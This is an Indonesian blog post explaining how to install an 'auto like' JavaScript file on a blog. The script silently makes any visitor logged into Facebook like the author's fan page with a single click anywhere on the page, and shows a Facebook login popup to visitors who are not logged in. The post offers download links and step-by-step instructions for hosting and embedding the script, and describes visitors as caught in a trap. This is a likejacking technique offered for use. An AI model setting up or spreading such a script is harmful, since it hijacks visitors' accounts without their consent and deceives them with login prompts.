Cara Menambahkan Like Fan Page Facebook Otomatis Dari Kunjungan Blog

By | August 25, 2013

Cara Menambahkan Like Fan Page Facebook Otomatis Dari Kunjungan Blog – Memiliki facebook fans page dengan jumlah fans yang banyak termasuk sesuatu kebanggan tersendiri. Karena dengan fans yang banyak dapat pula mendatangkan keuntungan tersendiri, contohnya kita gunakan facebook fans page itu untuk media promosi jasa maupun barang. Ini bukan hanya perkara yang gampang untuk mendatangkan fans bila kita tidak mempunyai cara spesial, jika hanya anda seorang public profil atau materi yang ada didalam fans page itu banyak diminati pengguna facebook.

Banyak jasa yang tawarkan facebook fans page topup ( jasa menambahkan fans page facebook ) dengan harga yang beragam serta umumnya dari mereka memakai script auto like. Nyatanya cara memakai script auto like ini cukup gampang syaratnya anda mesti mempunyai situs (blog) atau web, makin banyak pengunjung di situs (blog) makin banyak juga yang terkena perangkap auto like ini.

Dibawah ini merupakan cara kerja script auto like :

  1. Bila ada pengunjung situs (blog) anda didalam kondisi login facebook, maka dengan otomatis dapat me like asal dia malakukan klik dimanapun didalam situs (blog) anda.
  2. Bila ada pengunjung situs (blog) anda tidak didalam kondisi login facebook, saat pengunjung tersebut lakukan klik dimanapun didalam situs (blog) anda, maka dapat nampak popup halaman login facebook.

Cara menempatkan script auto like :

  1. Download file javascript autolike yang sudah saya bikin di sini (http://www.mediafire.com/?2epu4342zt7izn3) atau disini (http://www.4shared.com/rar/WKmicueT/Facebook_Autolike.html) juga,
  2. Extrack file facebook_autolike. Rar selanjutnya buka file fb. Js dengan text editor ( notepad++ maupun notepad biasa )
  3. Ganti alamat  _url_fans_page_facebook_ dengan url fans page facebook anda.
  4. Buka http ://yourjavascript. Com
  5. Masukan file fb. Js yang sudah anda ubah
  6. Baiknya janganlah centang pilihan ( check box ) make private agar anda dapat menempatkanya pada sembarang blog/domain.
  7. Masukan e-mail anda serta klik upload.
  8. Tunggulah sampai proses uploading selesai selanjutnya buka e-mail anda.
  9. Bila sukses anda dapat memperoleh e-mail yang diisi link javascript.
  10. Masukan kode pemanggil javascript tersebut di situs anda. ( ke dasbor > ; rancangan > ; tambah gadget )
  11. Panggil file javascript yang sudah anda upload dengan kode : script type=text/javascript src=http ://xxxx/fb. Js/script
  12. Masukan kode pemanggil tersebut di atas /head di blog/website anda.
  13. Berikutnya tinggal tunggulah saja page anda dapat jadi tambah likenya, namun cara ini cepat sukses apabila situs (blog) atau webmu banyak pengujung.

Cukup sekian informasi yang bisa di himpun oleh corelita.com pada kesempatan kali ini. Mudah-mudahan pada kesempatan yang lain bisa memberikan kepada Anda informasi yang lebih bagus dan menarik, dan tentunya masih bisa memberikan manfaat bagi Anda semua.  Selamat mencoba, semoga berhasil dan mohon maaf apabila ada hal yang tidak pas dengan Anda. Jika ada yang perlu tanyakan atau disampaikan, silahkan tinggalkan pesan pada kotak komentar dibawah. Terima kasih